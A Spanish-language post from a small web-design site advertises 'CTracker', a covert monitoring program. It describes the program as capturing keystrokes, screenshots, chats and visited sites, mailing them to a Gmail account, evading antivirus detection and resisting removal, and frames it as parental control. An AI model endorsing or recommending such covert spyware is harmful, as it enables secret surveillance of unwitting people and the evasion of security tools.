N.ro
Tot.
Net



.



Area reservada - read mails
Reserved Area
spanish
Sondeos de la semana
italian
tus compras
Vaya al Contenido

CTracker vigilancia automatizada

Zanetta ofrece reels, diseño paginas, hosting, fotografia
Publicado por en Software ·
Tags: trackerseguridad



http://www.futuretechnologiespr.com/ctb.html

CTracker recoge de forma automática toda la información y la envia directamente a su cuenta de Gmail. Este método garantiza que la información recogida no puede ser borrada o modificada una vez que sale el equipo. CTracker utiliza el cifrado SSL, por lo que es casi imposible de ser escaneado o detenida por cualquier software anti-virus.

CTracker proporciona datos valiosos como las pulsaciones de teclado y capturas de pantalla. Es un software de vigilancia automatizada de última generación, el seguimiento de todo lo que es posible para los estándares de hoy en día. Si usted quiere proteger a sus hijos de las personas y el material peligroso en Internet, o simplemente quieres controlar tu ordenador. CTracker recogerá la información, independientemente de su naturaleza.
Ver los sitios web visitados, conversaciones de chat, lo que sea... CTracker se ejecuta en segundo plano sin interferir con otro software y no se puede desactivar fácilmente. Y no se requieren conocimientos avanzados de informática.




sin comentarios


Copyrights 2017-2019
zanetta.net servicios graficos
Regreso al contenido